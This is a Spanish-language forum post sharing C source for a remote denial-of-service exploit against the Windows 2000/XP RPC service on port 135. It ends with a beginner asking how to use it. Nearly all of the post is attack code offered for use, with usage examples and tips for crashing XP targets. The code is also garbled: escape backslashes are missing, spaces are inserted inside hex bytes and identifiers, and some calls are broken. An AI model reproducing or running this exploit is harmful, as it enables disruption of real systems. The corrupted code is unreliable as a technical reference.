Windows XP/2000 D.o.S Remote Exploit

[Vassily]

Hace D.o.S a máquinas con la vulnerabilidad de RPC Win 2000/XP
Código:

--------------------------------------------------------------------------------------------------------------------------------

/*
************************************************************************
* MS WIN RPC DoS CODE FROM SPIKE v2.7
*
* Compile it use:
* cl winnuke.c
*
* Usage:
* winnuke targetip
*
* Code by lion, Welcomde to HUC Website
Para ver este enlace Registrate o Inicia Sesion
* 2002/10/22
************************************************************************
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char sendcode1[] =
"x05x00x0bx03x1 0x00x00x00x48x 00x00x00x02x00 x00x00"
"xd0x16xd0x16x0 0x00x00x00x01x 00x00x00x00x00 x01x00"
"x60x9exe7xb9x5 2x3dxcex11xaax a1x00x00x69x01 x29x3f"
"x02x00x02x00x0 4x5dx88x8axebx 1cxc9x11x9fxe8 x08x00"
"x2bx10x48x60x0 2x00x00x00x05x 00x00x01x10x00 x00x00"
"xd0x16x00x00x8 fx00x00x00x20x 27x01x00x00x00 x02x00"
"xf0x00x00x00x0 0x00x00x00xf0x 00x00x00";

char sendcode2[] =
"x88x13x00x00x0 0x00x00x00x88x 13x00x00";

char sendcode3[] =
"xffxffxffxffxf fxffxffxffx00x 00x00x00x00x00 x00x00"
"x00x00x00x00x0 0x02x00x00x00x 00x00x00x00x02 x00x00";

char sendcode4[] =
"xfexffx00x00x0 0x00x00x00xfex ffx00x00x3dx3d x3dx3d"
"x3dx3dx3dx3dx3 dx3dx3dx3dx3dx 3dx3dx3dx3dx3d x3dx3d"
"x05x00x00x00x1 0x00x00x00xd0x 16x00x00x8fx00 x00x00"
"x50x10x01x00x0 0x00x02x00";

char sendcode5[] =
"x05x00x00x00x1 0x00x00x00xd0x 16x00x00x8fx00 x00x00"
"x80xf9x00x00x0 0x00x02x00";

char sendcode6[] =
"x05x00x00x00x1 0x00x00x00xd0x 16x00x00x8fx00 x00x00"
"xb0xe2x00x00x0 0x00x02x00";

char sendcode7[] =
"x05x00x00x02x1 0x00x00x00x60x 15x00x00x8fx00 x00x00"
"x60x15x00x00x0 0x00x02x00";

char sendcode8[] =
"x00x00x01x10x0 0x00x00x00x00x 00x01x10x00x00 ";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionReques ted;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize;
SOCKET s;
char buffer[20480];

printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================rn");
printf("================= By Lion, Welcome to
Para ver este enlace Registrate o Inicia Sesion =================rnn");

if (argc < 2)
{
printf("Usage:rn");
printf("  %s <TargetIP> [TargetPort]rn", argv[0]);
printf("Example:rn");
printf("  %s 192.168.0.1rn", argv[0]);
printf("  %s 192.168.0.1 135rn", argv[0]);
printf("PS:rn");
printf("  If target is XP, try 2 times.rn");
exit(1);
}

wVersionReques ted = MAKEWORD(1, 1);
if (WSAStartup(wVersionReques ted, &wsaData) < 0) return -1;

targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);

s = socket(AF_INET, SOCK_STREAM, 0);
if(s==INVALID_SOCKET)
{
printf("Socket error!rn");
exit(1);
}

printf("Resolving Hostnames...n");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.n", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr. s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_famil y = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("Connecting...n");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.n");
exit(1);
}

printf("Connected!...n");
printf("Sending Packets...n");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packetsrn");
closesocket(;
exit(1);
}

memset(&buffer, 'x41', 240);
send(s, buffer, 240, 0);

send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, 'x42', 5000);
send(s, buffer, 5000, 0);

send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, 'x43', 512);
send(s, buffer, 512, 0);

send(s, sendcode4, sizeof(sendcode4)-1, 0);
// memset(&buffer, 'x44', 20480);
// send(s, buffer, 20480, 0);

// /*
memset(&buffer, 'x44', 5000);
send(s, buffer, 5000, 0);

send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, 'x45', 5000);
send(s, buffer, 5000, 0);

send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, 'x46', 5000);
send(s, buffer, 5000, 0);

send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, 'x47', 5000);
send(s, buffer, 5000, 0);

send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, 'x48', 5000);
send(s, buffer, 5000, 0);

// */
printf("Nuked! rnIf target is XP, try a again! :)rn");
closesocket(;
WSACleanup();
return 0;
}

--------------------------------------------------------------------------------------------------------------------------------

[daperci]

Vassily,     ¿ podrias explicarme mas en detalle como usar este exploit ?
Soy muy novato en la materia y estoy queriendo aprender.
Salu2